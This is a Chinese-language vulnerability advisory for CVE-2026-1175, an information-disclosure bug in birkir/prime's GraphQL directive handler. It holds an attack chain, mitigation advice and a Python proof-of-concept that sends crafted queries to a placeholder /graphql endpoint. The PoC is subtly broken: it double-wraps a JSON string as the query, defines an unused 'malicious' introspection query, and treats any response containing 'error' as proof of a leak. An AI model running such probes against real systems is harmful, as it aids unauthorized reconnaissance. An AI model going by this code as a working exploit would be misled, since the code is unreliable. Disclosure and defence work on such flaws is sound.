CVE-2026-1175 CVSS 5.3 中危

CVE-2026-1175 birkir prime GraphQL指令处理器信息泄露漏洞

披露日期: 2026-01-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1175

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

birkir/prime

漏洞概述

CVE-2026-1175是birkir/prime项目中的一个中等严重性信息泄露漏洞。该漏洞存在于GraphQL指令处理器组件中，攻击者可以通过构造特定的GraphQL查询来触发错误消息，从而获取系统内部的敏感信息。该漏洞影响birkir prime 0.4.0.beta.0及之前版本。由于GraphQL端点通常暴露在网络上，且无需任何认证即可访问，远程攻击者可以轻松利用此漏洞进行情报收集。漏洞利用代码已公开，攻击者无需高深技术即可实施攻击。

技术细节

该漏洞位于birkir/prime项目的GraphQL指令处理器中。当攻击者向/graphql端点发送精心构造的GraphQL查询时，如果查询包含非法或恶意的指令，GraphQL处理器会生成包含堆栈跟踪或其他调试信息的详细错误消息。这些错误消息可能泄露服务器配置、内部路径、数据库连接信息、依赖版本等敏感信息。由于GraphQL端点通常作为API对外提供服务，且未对错误输出进行适当的过滤和清理，导致敏感信息通过错误消息暴露给攻击者。攻击者可以通过自动化工具批量探测目标系统的信息泄露情况。

攻击链分析

STEP 1

步骤1

攻击者发现目标站点存在GraphQL端点(/graphql)

STEP 2

步骤2

攻击者向GraphQL端点发送包含非法指令或异常查询的请求

STEP 3

步骤3

GraphQL指令处理器处理请求时发生错误

STEP 4

步骤4

错误处理器返回包含敏感信息的详细错误消息

STEP 5

步骤5

攻击者收集错误消息中的敏感信息(堆栈跟踪、配置信息等)

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2026-1175 PoC - GraphQL Information Disclosure
# Target: birkir/prime <= 0.4.0.beta.0

TARGET_URL = "http://target.com/graphql"

# Malicious GraphQL query to trigger error message
malicious_query = '''
{
  __schema {
    queryType {
      name
      fields {
        name
      }
    }
  }
}
'''

# Alternative: Trigger directive handler error
error_trigger_query = '''
{
  "query": "{ @invalidDirective }"
}
'''

def exploit():
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    # Send malicious query
    response = requests.post(
        TARGET_URL,
        headers=headers,
        data=json.dumps({"query": error_trigger_query}),
        timeout=10
    )
    
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")
    
    # Check for information disclosure in error message
    if any(keyword in response.text.lower() for keyword in ["stack", "trace", "error", "exception"]):
        print("[+] Information disclosure detected!")
        return True
    return False

if __name__ == "__main__":
    exploit()

影响范围

birkir/prime <= 0.4.0.beta.0

防御指南

临时缓解措施

临时缓解措施：在GraphQL配置中禁用详细错误返回，启用生产模式，配置统一的错误响应格式，避免泄露内部信息。同时对/graphql端点添加访问控制或速率限制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1175
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1175
3 Details https://www.cvedetails.com/cve/CVE-2026-1175/
4 VulDB https://vuldb.com/cve/CVE-2026-1175
5 Link https://github.com/birkir/prime/
6 Link https://github.com/birkir/prime/issues/546
7 Link https://vuldb.com/?ctiid.341769
8 Link https://vuldb.com/?id.341769
9 Link https://vuldb.com/?submit.731106

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表